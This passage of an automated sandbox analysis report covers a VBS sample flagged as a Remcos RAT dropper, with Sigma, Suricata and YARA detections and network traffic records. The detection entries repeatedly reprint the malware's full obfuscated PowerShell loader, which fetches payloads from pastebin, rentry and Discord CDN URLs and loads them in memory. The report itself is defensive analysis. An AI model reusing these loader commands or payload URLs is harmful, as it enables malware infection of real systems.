('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE
            Sigma detected: Suspicious Execution of Powershell with Base64
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text, CommandLine|base64offset|contains: jw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3460, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\segura.vbs", ProcessId: 1396, ProcessName: wscript.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T07:43:17.021310+010020204231Exploit Kit Activity Detected162.159.135.233443192.168.2.649756TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-31T07:43:17.021310+010020204251Exploit Kit Activity Detected162.159.135.233443192.168.2.649756TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
            Source: powershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_c062632a-0

            Exploits

            barindex
            Yara detected UAC Bypass using CMSTP
            Source: Yara matchFile source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR
            Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.6:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.6:49756 version: TLS 1.2

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD342CAD43h4_2_00007FFD342CACD5
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 00007FFD342CD896h4_2_00007FFD342CD7F8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, 00000C00h4_2_00007FFD3439243D

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 162.159.135.233:443 -> 192.168.2.6:49756
            Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 162.159.135.233:443 -> 192.168.2.6:49756
            Yara detected MSILDownloaderGeneric
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR
            Connects to a pastebin service (likely for C&C)
            Source: unknownDNS query: name: pastebin.com
            Uses ping.exe to check the status of other devices and networks
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
            Yara detected Generic Downloader
            Source: Yara matchFile source: 4.2.powershell.exe.2305184b690.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.powershell.exe.23052ec24b8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR
            Source: global trafficHTTP traffic detected: GET /raw/4B83LcVU HTTP/1.1Host: pastebin.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /shqm6g9p/raw HTTP/1.1Host: rentry.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a&is=672230ea&hm=1e5ddde8edfd2b0b55a1936b9b2cf98999ca75e818b8e4dadd7bc75ebedbbd24& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 104.20.3.235 104.20.3.235
            Source: Joe Sandbox ViewIP Address: 164.132.58.105 164.132.58.105
            Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
            Source: Joe Sandbox ViewIP Address: 162.159.135.233 162.159.135.233
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: global trafficHTTP traffic detected: GET /raw/J6uRjZrv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /vsm4ofxs/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /raw/J6uRjZrv HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /vsm4ofxs/raw HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: rentry.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /raw/4B83LcVU HTTP/1.1Host: pastebin.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /shqm6g9p/raw HTTP/1.1Host: rentry.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a&is=672230ea&hm=1e5ddde8edfd2b0b55a1936b9b2cf98999ca75e818b8e4dadd7bc75ebedbbd24& HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: pastebin.com
            Source: global trafficDNS traffic detected: DNS query: rentry.org
            Source: global trafficDNS traffic detected: DNS query: cdn.discordapp.com
            Source: powershell.exe, 00000004.00000002.2309229890.00000230519AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: HTTPS://CDN.DISCORDAPP.COM/ATTACHMENTS/1187381098527858721/1299360122446807113/ESTE2.TXT?EX=6723826A
            Source: powershell.exe, 00000004.00000002.2309229890.00000230519B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
            Source: powershell.exe, 00000002.00000002.2385225983.00000283519AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mS%F-sE
            Source: powershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
            Source: powershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D019C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D1007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000004.00000002.2309229890.000002305309D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.0000023052A16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
            Source: powershell.exe, 00000007.00000002.2217928363.0000020D0022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000004.00000002.2309229890.0000023053104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D01949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.org
            Source: powershell.exe, 00000002.00000002.2387245646.0000028351BD5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230513F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000007.00000002.2217928363.0000020D0022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000004.00000002.2373219888.0000023069B0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
            Source: powershell.exe, 00000002.00000002.2387245646.0000028351B8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
            Source: powershell.exe, 00000002.00000002.2387245646.0000028351BA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230513F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000004.00000002.2309229890.00000230519AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
            Source: powershell.exe, 00000004.00000002.2309229890.00000230519AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1187381098527858721/1299360122446807113/este2.txt?ex=6723826a
            Source: powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000007.00000002.2217928363.0000020D0022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000004.00000002.2309229890.000002305242C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D01471000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000004.00000002.2373219888.0000023069AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.coa
            Source: powershell.exe, 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2217928363.0000020D019C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D1007A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2230796347.0000020D101B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000004.00000002.2309229890.000002305304C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230517B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
            Source: powershell.exe, 00000004.00000002.2309229890.000002305304C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw
            Source: powershell.exe, 00000004.00000002.2309229890.000002305304C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2309229890.00000230517B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/4B83LcVU
